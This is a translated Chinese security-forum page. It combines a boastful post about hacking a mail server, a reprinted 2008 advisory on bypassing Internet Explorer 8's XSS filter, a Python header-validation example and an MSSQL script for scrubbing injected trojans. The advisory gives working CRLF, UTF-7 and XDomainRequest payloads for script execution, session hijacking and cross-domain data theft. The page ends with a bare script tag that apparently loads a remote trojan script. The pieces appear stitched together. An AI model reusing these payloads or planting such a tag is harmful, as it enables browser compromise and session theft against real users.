
非安全中国网 Disclaimer
1. All statements and images in this post are purely the personal opinion of the poster and are unrelated to the position of this site;
2. This topic was posted by 漂流; the poster 漂流 complies with the six management rules of the "Copyright and Disclaimer Notice" and holds the relevant rights;
3. Other organizations or individuals must obtain the consent of the poster 漂流 and of this site before using, reprinting or quoting this post;
4. Parts of this post are reprinted from other media and published on this site; the purpose of reprinting is to convey more information, and it does not mean this site endorses its views or is responsible for its authenticity;
5. If this post infringes the copyright of your site or of any individual, please notify this site immediately; it will be deleted promptly, with our sincerest apologies;
6. Site administrators and moderators may delete this post without prior notice to the poster.

Notice: the author has been banned or deleted; content automatically hidden.


Reply to #2 vini5

    Oh, I'll be careful next time...

Haha, nice one, you can change your avatar now, though the current one is pretty good too.

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow.

[Original] Watch how a newbie hacks the TX mail server
Made a little video for fun, but it's a pretty dangerous vulnerability! A vulnerability in TX mail; no more talk, let's get to it! Welcome to the alliance forum www.slenk.net. 非安全中国网 welcomes your visit! www.sitedir.com.cn: we accept security testing; if you're an expert, please tell us after you find a vulnerability! OK, let's start looking at the TX vulnerability; it's in the mailbox.

hack by vini5. This is just so funny: why will this show the mail files? We can see them from IE, so funny. That is, did I really hack the TX mail? Oh my God!
※hack by vini5
#########################################################################
# website          : http://www.sitedir.com.cn/
#            hack by vini5
#
#########################################################################
See? It's that simple to write a file! OK, enough said; study it slowly and see!
Download: http://www.slenk.net/attachment.php?aid=1360
Local download: http://www.sitedir.com.cn/video/TXmail.rar

Haha, the posts on the webmaster forum are good; it's a place for bookish people like us, hehe.

IE 8.0 Beta 2 Anti-XSS Issues
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date: December 11, 2008
Date Reported: October 5, 2008
Severity: Medium-High (Execute scripts, Turning Protection Off, Transfer data Cross Domains)
Vendor: Microsoft
Systems Affected: Windows Platform with Internet Explorer 8.0 Beta 2

Overview:
Aspect9 has discovered several vulnerabilities in Microsoft Windows Internet Explorer 8.0 Beta 2. This new version of Microsoft's famous browser includes new security improvements such as a Cross Site Scripting (XSS) filter. This version also includes a new object that safely allows transferring data across domains, allowing them to interact with each other.

The Anti-XSS filter has been found to have some security holes in the current implementation. Microsoft decided to filter "Type 1 XSS", which is free text sent to the server being reflected to the user and therefore injecting HTML code into the website's page. They chose not to handle certain situations such as injection into a JavaScript tag space, which would be extremely difficult to filter. The software giant also chose not to filter injection into HTTP headers, which will drive hackers to focus on discovering CRLF vulnerabilities.

A quote of Microsoft's Anti-XSS filter design philosophy:
<<<
"Like all security mitigation and protection technologies, the XSS Filter's approach does have limitations, being that it is a pragmatic balance between application compatibility, security, and performance.

Some examples:
* Injection into some contexts is not blocked. Ex: Scenarios where content can be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked. Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>

For more information about the Anti-XSS filter:
http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

In order to understand the contents of this advisory, the reader must be familiar with the concept of CRLF, which is distinguished from CSRF.
http://www.owasp.org/index.php/CRLF_Injection
http://www.owasp.org/index.php/CSRF

Technical Details:

Bypass using CRLF+Encodings:
---------------------------------------------
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1 XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the filter, though the data in the query string will still be filtered. This means that if an attacker tries to exploit a CRLF for XSS in the casual manner, used in this demo:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>

his attack will fail, as "<script>" will be filtered to "<sc#ipt>".

However, an attacker can inject a Content-Type header and overwrite the page charset and therefore bypass the XSS filter, which uses the prior encoding. A good example for this is with UTF-7; the following request:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>

will result in:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sun, 05 Oct 2008 23:46:11 GMT
Connection: close

<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html

This will be rendered as UTF-7 and will execute.

Bypass using CRLF+"X-XSS-Protection":
-------------------------------------------------------
In addition to the problem of CRLF being able to re-write the page and bypass the filter using a different encoding than the one of the page, Microsoft were kind enough to leave a backdoor, AKA a feature, for developers to turn the filter off. This header is called "X-XSS-Protection" and gets a Boolean value of 0 or 1. By injecting "X-XSS-Protection: 0" through CRLF, an attacker can shut down the XSS protection for the current request.

Demo:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>

Of course the problem goes further, to any HTTP header that can be used maliciously: setting cookies and by that changing to a different user than the one logged on, such as stealing their cookie and then replacing it with a cookie of a bulk user and therefore taking over their session; using the "Location:" header to redirect pages and internal frames/iframes to look-alike phishing websites; etc.

Demos:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>

CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:
---------------------------------------------------------
Having a CRLF injection already gives an attacker the ability to overwrite the HTTP response BODY, which means he can create a new hidden image/frame/form and send data through it, data such as the domain's cookie. But it is clear that overwriting the body using CRLF and making it look the same requires a "fetcher" server-side script on the same domain. Also, a network filter or a WAF may deny injection of a double CRLF (%0d%0a%0d%0a). As time goes by and security evolves, the attacker should have a harder time sending this information out silently.

In IE8, there is a new object called "XDomainRequest" which is designed to allow safe data exchange across domains. More information at:
http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx

The browser will only allow the client (the JavaScript code) to interact with that website if the website returns the "XDomainRequestAllowed" Boolean header.

Using CRLF to inject the XDomainRequestAllowed header, an attacker can interact in a CROSS DOMAIN mode with that website without its consent, as it is being faked by the injected header. This attack concept on the XDomainRequest in general should be named "XAI" (XDR Allowed Injection).

This is a demo request to a CRLF vulnerable web page:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1

This is how the attacker's script would look:
------------------------------------------------
<script>
try {
  xdr = new XDomainRequest();
  xdr.onload = function() {
    alert(xdr.responseText);
  }
  xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1");
  xdr.send("");
} catch (e) {
  alert(e.description)
}
</script>
------------------------------------------------
The attacker can now transfer data to/from that domain and other domains with just 1 header injection, a new, by-design weapon to replace leaking data with XSS. An attacker can use the new feature to interact with web servers (i.e. send and receive data from those domains) by pretending to have the authorization to do so, using a single CRLF header injection. This is an ultimate vulnerability that exploits this new feature to enable easy information data leakage and cross domain attacks.

UTF-7 Websites are not filtered:
-------------------------------------------
When the page charset is set to UTF-7, whether by the HTTP header or by a meta tag, the Anti-XSS filter will not apply on this page, allowing UTF-7 encoded injected HTML code to execute. In other words, UTF-7 content sent to UTF-7 encoded web pages is not filtered, therefore allowing XSS attacks on UTF-7 web pages.

I must admit that I have never met a website written in UTF-7 for non-malicious purposes, but it is still a feature, and there are many websites that implement language templates and receive the charset as a parameter from the query string or the cookie.

Demos:
http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div

Direct bypass using any double injection:
-----------------------------------------
A quote from the filter's architecture implementation:
<<<
"If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>
Well, that is not accurate.

ANY second appearance of the injected data will allow execution of script code. The concept is that data inside tags such as script and style is parsed by their own parser.

The CSS (style) parser has 2 characteristics that differentiate it from the script parser:
1) It is a silent parser (there is no indication of failure).
2) It executes as batch operations per block, which means that closing A NON EXISTING (never opened) block will cause parsing of the following blocks. What does this mean?!?!

It means that, in the quite common scenario of any text injected just twice at any position inside the HTML of the page (except inside textarea/script/style tags; these can also be fixed by putting </textarea> in a CSS comment), at the first point where the code is injected into the page

} BODY{a:expression(alert('hi'))};</style>***<style>***

a style tag is opened and anything after it will be ignored by a silent CSS parser error, and on the second injection:

***} BODY{a:expression(alert('hi'))};</style>***<style>

a new style block will be opened and rendered, and this would automatically execute script code!

Demo:
http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>

Filter False Positives:
-----------------------
The following text sent to a page as parameters will trigger a false-positive match by the Anti-XSS filter:

<"script">alert('innocent code')</script>
<'script'>alert('innocent code')</script>
"<[whatever]script>alert('innocent code')</script>

The following should trigger on most CSS design forums with a preview feature:
<style>@import</style>
<style>x:y(1)</style>

This means that a CSS tutorial web page cannot send to itself or to another page the following raw text (whether it will be treated as text or as HTML by the receiving page):

<style>color:rgb(1,2,3)</style>

Vendor Status:
Microsoft's response regarding the CRLF issues:
"We will not be led to compromise the XSS Filter's web site compatibility by attempting to address every conceivable XSS attack scenario."

Microsoft's response regarding the STYLE issue:
"We hope we can get a change in prior to IE8 RC1"

Microsoft's response regarding the "filter not applied in UTF-7 Websites":
"Behaviour is by design"

Credit: Rafel Ivgi

Greetings: David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter, Inga, Lucid, h.p.c, Dror Shalev, Liu Die Yu, wir3less, Zull, 0fir0, dbrod, ax1les, whitehawkofjustice

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
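The header-injection pattern behind the CRLF bypasses in the advisory above, as an added example that is not part of the original post or of Aspect9's advisory: a Python model of a crlf.py-style endpoint that reflects its url parameter into Set-Cookie, the hardened variant that rejects CR/LF before the value reaches the header, and a response check that lists header names the application never set. The endpoint body, the constructed sample payload (taken from the X-XSS-Protection demo URL) and the function names are assumptions made here; crlf.py is only named in the advisory, not shown.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the URL-decoded "url" parameter from the advisory's
# X-XSS-Protection demo (%0d%0a becomes CR LF), plus a benign value for comparison.
CRLF_PAYLOAD = unquote("cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a"
                       "<html><body><script>alert('owned')</script></body></html>")
BENIGN_VALUE = "cooki1=value1;"
_CTL = re.compile(r"[\r\n\x00]")  # characters that end a header line or the header block

def safe_header_value(value):
    """Hardened form: refuse any header value carrying CR, LF or NUL instead of emitting it."""
    if _CTL.search(value):
        raise ValueError("control character in header value")
    return value

def build_response(url_value, hardened):
    """Model of the advisory's crlf.py: the parameter lands in Set-Cookie.
    hardened=False concatenates it raw (vulnerable); hardened=True validates it first."""
    if hardened:
        url_value = safe_header_value(url_value)
    return ("HTTP/1.1 200 OK\r\n"
            "Content-Type: text/html\r\n"
            "Set-Cookie: url=" + url_value + "\r\n"
            "\r\n"
            "<html><body>ok</body></html>")

def accepts_header_value(value):
    """True if the hardened builder would emit this value, False if it rejects it."""
    try:
        safe_header_value(value)
        return True
    except ValueError:
        return False

def parse_response(raw):
    """Split a raw response the way a browser does: lowercased header names and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    names = [line.partition(":")[0].strip().lower() for line in head.split("\r\n")[1:]]
    return names, body

def smuggled_headers(raw, expected):
    """Detection check: header names present in the response that the application never set."""
    names, _ = parse_response(raw)
    return sorted(set(names) - set(expected))
```

Run against CRLF_PAYLOAD, the unhardened builder yields an extra x-xss-protection header and a body that starts with the injected HTML, while the hardened builder raises before any header is written.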

MSSQL database cleanup: SQL statements (security helper)
SQL statements to batch-delete trojans inserted into an MSSQL database. A friend's server had JS trojans batch-inserted: almost every table's text fields had been injected. I found this SQL online and modified it a bit; keeping it for reference.

-- Cleanup: generate one UPDATE per string column of every user table that strips the
-- injected tag, then run them all through sp_MSforeach_Worker via the global cursor hCForEach.
-- REPLACE() does not accept a text column directly, so the column is cast to nvarchar(max)
-- first (requires SQL Server 2005 or later).
DECLARE hCForEach CURSOR GLOBAL FOR
SELECT N'UPDATE ' + QUOTENAME(o.name)
     + N' SET ' + QUOTENAME(c.name)
     + N' = REPLACE(CAST(' + QUOTENAME(c.name) + N' AS nvarchar(max)), '
     + N'''<script src=http://www.hacker.com.cn/cn.js></script>'', '''')'
FROM sysobjects o, syscolumns c, systypes t
WHERE o.id = c.id
  AND OBJECTPROPERTY(o.id, N'IsUserTable') = 1
  AND c.xusertype = t.xusertype
  AND t.name IN ('varchar', 'nvarchar', 'char', 'nchar', 'text')
EXEC sp_MSforeach_Worker @command1 = N'?'

<script src=http://www.sitedir.com.cn/dama.js></script>